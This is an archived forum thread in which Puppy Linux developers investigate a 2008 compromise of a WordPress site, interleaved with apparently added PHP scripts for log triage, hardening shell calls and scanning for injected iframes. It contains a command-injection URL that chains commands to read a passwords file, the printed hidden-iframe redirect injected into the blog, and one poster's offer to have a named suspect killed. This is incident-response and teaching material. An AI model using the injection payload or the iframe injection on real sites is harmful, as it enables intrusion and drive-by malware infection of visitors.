Puppy Linux Discussion Forum
Puppy HOME page: puppylinux.com
Serious security breach on Developer Blog
Page 1 of 9 [121 Posts]
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

Posted: Sat 12 Jan 2008, 18:38. Subject: Serious security breach on Developer Blog

I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.

I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.

The big question is, how could someone do that?

I have raised a ticket with servage and asked them that question.

Note, I've turned off comments on my blog, but there were no suspicious comments anyway.

_________________
http://bkhome.org/news/
veronicathecow


Joined: 21 Oct 2006
Posts: 533

Posted: Sat 12 Jan 2008, 18:50

Hi Barry, sorry to hear of this problem. My first thought is "Any chance that your machine has been compromised?" Secondly was, perhaps it's time to see if there is need to tighten up Puppy security? (It may have been on the server from their side but it looks as though it was making a good stab at taking over your PC.)
Perhaps now that things like the Asus eeePC are getting sold in volume and Firefox is becoming more powerful, the forces of darkness will be taking a deeper interest in open source.
Cheers
Tony
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

Posted: Sat 12 Jan 2008, 19:00

I just PM'd this to Barry, before I noticed the thread here.

You're all welcome to read it.

Regarding the page change:

Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html

Regarding the one comment that got through the other day, I had signed up to post what follows this link. In the meantime I did some further research and found it was probably SQL injection.

Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordpress-231-charset-sql-injection-vulnerability/

---

Your security implementation is probably adequate. There are three methods which could be used to create such spam that came to mind when I read your post.

1-an exploit in the WordPress code to bypass the security layers. If you examine your http logs for the request that created the comment it might tell you if this was the method used. Also it would allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string which would help the coders diagnose the problem faster.

2-a server level database permission issue that allowed another user or site on the same server to insert an entry directly to your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority of the admins had a weak understanding of security.

3-an SQL injection vulnerability in the registration form, the login form or the search form. The login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. This would depend on what permissions to which tables the user account that it queried as were given. If that user doesn't have permission to insert to the comment table in the database, it's not this.
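John Doe's first suggestion is to go to the HTTP logs and pull out the request that created the comment, together with its query string. The script below is an added example, not his code and not anything from the thread: it parses Apache "combined" log lines and keeps the requests worth a closer look, namely comment submissions to wp-comments-post.php and requests whose decoded query string carries shell or SQL metacharacters. The log lines are constructed for the demo; the IP addresses, paths and domain in them are placeholders.

```php
<?php
// Added example (not John Doe's code): filter an Apache combined access log
// down to the requests that could have created a comment or probed the site,
// so the request and its query string can be handed to the developers/host.

// combined format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
const LOG_LINE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/';

function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_LINE, $line, $m)) {
        return null;                       // not a combined-format line
    }
    $url = parse_url($m[4]);
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $url['path'] ?? $m[4],
        'query'  => $url['query'] ?? '',
        'status' => (int) $m[5],
        'ua'     => $m[8],
    ];
}

// Keep: every POST that writes a comment, plus any request whose decoded
// query string contains shell separators or SQL keywords.
function suspicious_requests(array $lines): array
{
    $out = [];
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null) {
            continue;
        }
        $reasons = [];
        if ($r['method'] === 'POST' && preg_match('#/wp-comments-post\.php$#', $r['path'])) {
            $reasons[] = 'comment submission';
        }
        $q = urldecode($r['query']);       // %3B etc. become visible again
        if ($q !== '' && preg_match('/[;|`]|\b(union|select|insert)\b/i', $q)) {
            $reasons[] = 'metacharacters in query string';
        }
        if ($reasons) {
            $r['reasons'] = $reasons;
            $out[] = $r;
        }
    }
    return $out;
}

// Constructed sample log: a normal page view, a comment POST, a command
// injection probe of the kind MU describes, and an SQL-looking search.
$sample = [
    '203.0.113.10 - - [10/Jan/2008:14:02:11 -0500] "GET /blog/ HTTP/1.1" 200 8213 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2008:14:05:40 -0500] "POST /blog/wp-comments-post.php HTTP/1.1" 302 0 "http://example.invalid/blog/?p=12" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Jan/2008:14:06:02 -0500] "GET /index.php?whatnext=ls%3Bid HTTP/1.1" 200 512 "-" "curl/7.16"',
    '192.0.2.55 - - [10/Jan/2008:14:07:30 -0500] "GET /blog/?s=x%27%20UNION%20SELECT%201 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
];

foreach (suspicious_requests($sample) as $r) {
    printf("%s %-14s %-4s %s%s  [%s]\n", $r['time'], $r['ip'], $r['method'], $r['path'],
        $r['query'] !== '' ? '?' . $r['query'] : '', implode(', ', $r['reasons']));
}
```

Run it with `php triage.php`, or replace `$sample` with `file('access.log')` on a real log. The three flagged lines share a source address and a time window, which is the kind of grouping that tells you which request to report; the comment POST by itself is normal traffic and is listed only so it can be matched against the spam comment's timestamp.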
MU


Joined: 24 Aug 2005
Posts: 13642
Location: Karlsruhe, Germany

Posted: Sat 12 Jan 2008, 21:10

I had a comparable problem not long ago.
Using gFTP I could see that the problem came from a newsletter module of, I think, phpBB.
It seems that a weak point was taken to install a spam-mailer.
You could see it by analyzing how the folders around it got infected by new PHP-Scripts.

One concrete example:

if you have such code:
$thecommand = $_GET["whatnext"];
system($thecommand);

So you would call a website like this:
http://xyt.com/index.php?whatnext=ls

Then the string "ls" would be passed to index.php
It then is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords

You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability; there are more advanced ones, as John Doe said.

And software IS buggy.
We had the example of a commercial board system where you registered as a new user with restrictions, and then, until you logged in to your account, had access to all boards, even those that are usually only allowed to be viewed by administrators.

Mark
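The pattern Mark describes, as an added example that is not code from his post or from any real project: the vulnerable handler that hands the `whatnext` parameter to the shell, beside a hardened version in which the parameter only selects from commands the application itself defines. The function names, the command table, the `file` parameter and the `/var/www/html` path are assumptions for illustration.

```php
<?php
// Added example (not from the forum post): the shell-injection pattern Mark
// describes, beside a hardened version. Function names, the command table
// and the paths are assumptions for illustration.

// VULNERABLE: the raw query parameter reaches the shell, so any separator in
// ?whatnext=... (";", "|", "&&", backticks) runs additional commands.
function run_unsafe(array $get): string
{
    $thecommand = $get['whatnext'] ?? '';
    return (string) shell_exec($thecommand);
}

// HARDENED: the parameter is only a key into a table of commands that the
// application defines; user input never reaches the shell at all.
function run_safe(array $get): ?string
{
    $allowed = [
        'list' => ['ls', '-l', '/var/www/html'],   // assumed web root
        'disk' => ['df', '-h'],
    ];
    $key = $get['whatnext'] ?? '';
    if (!array_key_exists($key, $allowed)) {
        return null;                  // unknown action: refuse, do not guess
    }
    // escapeshellarg() quotes every argument separately, so nothing on the
    // command line can be re-read by the shell as an operator.
    $cmd = implode(' ', array_map('escapeshellarg', $allowed[$key]));
    return (string) shell_exec($cmd);
}

// When a user-supplied value really must become an argument (a file name,
// say), restrict it to a strict character set AND quote it. The allowlist
// check is the control that matters; the quoting is defence in depth.
function show_file(array $get): ?string
{
    $name = $get['file'] ?? '';
    if (!preg_match('/^[A-Za-z0-9._-]{1,64}$/', $name) || $name[0] === '.') {
        return null;                  // rejects "../", "a;b", empty names, dotfiles
    }
    $cmd = 'cat ' . escapeshellarg('/var/www/html/' . $name);   // assumed directory
    return (string) shell_exec($cmd);
}

if (PHP_SAPI === 'cli') {
    var_dump(run_safe(['whatnext' => 'disk']) !== null);   // bool(true): known action runs
    // Both requests below are refused (NULL) by the hardened functions;
    // run_unsafe() would have executed the first one exactly as written.
    var_dump(run_safe(['whatnext' => 'ls;id']));
    var_dump(show_file(['file' => '../wp-config.php']));
}
```

The point of `run_safe()` is that there is no string for the attacker to break out of: the request only names an entry in a table, and the table entries are fixed arrays, not strings built from input. Where a value has to flow through, as in `show_file()`, validate it against the narrowest pattern the feature needs before it is ever quoted.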
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

Posted: Sat 12 Jan 2008, 22:28

Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.

This covers goosee.com as well as puppylinux.com, each in its own subdirectory.

I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.

So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.

I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.

Right now, I'm nervously watching my site to see if anything more happens to it.

There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:

Code:
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe>

_________________
http://bkhome.org/news/
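As an added example (not Barry's code and not part of the thread), a PHP command-line script that does what Barry did by hand with gFTP: walk a web root and list the files that carry an invisible iframe, PHP files with output after their final `?>` (where the hacked index.php carried its iframe), files modified recently, and files whose permissions differ from the 644/755 that servage recommended. It builds its own sample web root in a temporary directory; the iframe target in that sample is a placeholder domain, not the one from the thread.

```php
<?php
// Added example, not from the forum thread: scan a web root for the signs
// Barry found by hand. The sample files are constructed below; the iframe
// target in them is a placeholder, not the real domain from the thread.

// An <iframe> with zero size or display:none is invisible to the visitor and
// is the classic carrier for a redirect to an exploit page. Treat a hit as
// "inspect this file", not as proof on its own.
const HIDDEN_IFRAME = '/<iframe\b[^>]*(?:\bwidth\s*=\s*["\']?0\b|\bheight\s*=\s*["\']?0\b|display\s*:\s*none)[^>]*>/i';

// Everything after a PHP file's last "?>" is sent to the browser verbatim,
// which is exactly where the hacked index.php carried its iframe.
const TRAILING_OUTPUT = '/\?>(?!.*\?>)\s*\S/s';

function scan_webroot(string $root, int $modifiedSince): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $file) {
        $rel      = substr($file->getPathname(), strlen($root) + 1);
        $mode     = $file->getPerms() & 0777;
        $expected = $file->isDir() ? 0755 : 0644;    // the host's recommendation
        if ($mode !== $expected) {
            $findings[] = sprintf('%s: mode %o, expected %o', $rel, $mode, $expected);
        }
        if ($file->isDir()) {
            continue;
        }
        if ($file->getMTime() >= $modifiedSince) {
            $findings[] = sprintf('%s: modified %s', $rel, date('Y-m-d H:i', $file->getMTime()));
        }
        if (!preg_match('/\.(php|html?|js)$/i', $rel)) {
            continue;                                  // only content files are grepped
        }
        $body = (string) file_get_contents($file->getPathname());
        if (preg_match(HIDDEN_IFRAME, $body, $m)) {
            $findings[] = sprintf('%s: hidden iframe: %s', $rel, substr($m[0], 0, 80));
        }
        if (preg_match('/\.php$/i', $rel) && preg_match(TRAILING_OUTPUT, $body)) {
            $findings[] = "$rel: output after the final ?> tag";
        }
    }
    sort($findings);
    return $findings;
}

// --- constructed sample web root: one clean page, one injected index.php ---
$root = sys_get_temp_dir() . '/scan-demo-' . getmypid();
mkdir("$root/blog", 0755, true);
file_put_contents("$root/blog/about.html", "<html><body>Puppy Linux</body></html>\n");
file_put_contents("$root/blog/index.php",
    "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>"
    . "<iframe src=\"http://example.invalid/tds/index.php?out=1\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>\n");
chmod("$root/blog", 0755);
chmod("$root/blog/about.html", 0644);
chmod("$root/blog/index.php", 0755);                  // the "hacked file sitting at 755" case
touch("$root/blog/about.html", time() - 30 * 86400);  // an old page nobody touched

// Report anything changed in the last day, plus the structural checks above.
foreach (scan_webroot($root, time() - 86400) as $line) {
    echo $line, "\n";
}
```

On the sample root only `blog/index.php` is reported, four times: wrong mode, recent modification, a hidden iframe, and output after the closing tag. The trailing-output check will also fire on legitimate theme templates that end in HTML, so it is most useful on files that should be pure PHP, like index.php and wp-blog-header.php; the modification-time check is the one worth running first, against the date the compromise is believed to have happened.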
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

Posted: Sat 12 Jan 2008, 23:08

Barry
Not to sound like an idiot, but this is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

Posted: Sun 13 Jan 2008, 00:29

I got the name of who is responsible already.

Mahmod AbdAllah el Gashmi

He lives in Turkey. Just say the word Barry and I'll have him killed.

He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?title=Hijacked_host

I'll post how I figured that out in a bit. I have to go get my nightly brew.
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

Posted: Sun 13 Jan 2008, 01:11

Well..it looks like puppylinux.ca is also down.

My IP address will not resolve to my domain.

My tech guys are working on this problem but it may be tomorrow before I get an answer.

Sorry all.

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

Posted: Sun 13 Jan 2008, 01:33

Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).

Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):

HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.

Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).

The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his root kit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index.php?showtopic=18139&pid=85109&st=0&#entry85109

What a piece of trash.

Attachment: files.tar (8 KB, downloaded 922 times). Description: text files are in the tarball.
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

Posted: Sun 13 Jan 2008, 01:54

I'm not sure if this is related or not.

http://www.internetnews.com/security/article.php/3712071

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

Posted: Sun 13 Jan 2008, 02:10

Caneri wrote:
    I'm not sure if this is related or not.

It's all related somehow.

Cool read, thanks for the link (hopefully it wasn't one of them!)
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

Posted: Sun 13 Jan 2008, 02:51

Okay, if it's an exploit for IE, then it's likely not targeting Linux and wouldn't have compromised my PC...

Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.

My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.

So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!

So, I used the "bad words" filter to block everything - how crude.

_________________
http://bkhome.org/news/
Previously known as Guest


Joined: 28 Sep 2005
Posts: 240

Posted: Sun 13 Jan 2008, 04:33

As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.
Lobster
Official Crustacean


Joined: 04 May 2005
Posts: 15117
Location: Paradox Realm

Posted: Sun 13 Jan 2008, 04:46


I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/

corrective medication for penile dysfunction = via***
I can not use the word via*** as John's efforts to fight the mal merchants change the word to "poisonous crap"

Look how hard John and Flash work to stop spam
(and it still gets through . . . )

It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html

We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.

An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack)

It is important to maintain one's psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that)

So far the solution seems right:

    1. Exposing and dealing with the situation
    2. Notifying and working with the software and server providers


When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions

Related to spam is the use of gmail to filter
(not ideal but no solution is)

Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?

Good luck.

_________________
Puppy WIKI

Last edited by Lobster on Tue 05 Feb 2008, 00:45; edited 1 time in total
Previously known as Guest


Joined: 28 Sep 2005
Posts: 240

Posted: Sun 13 Jan 2008, 05:48

Previously known as Guest wrote:
As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.


Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]

Maybe I'll start posting the fscking IPs involved again! I could write a novel of IP addresses.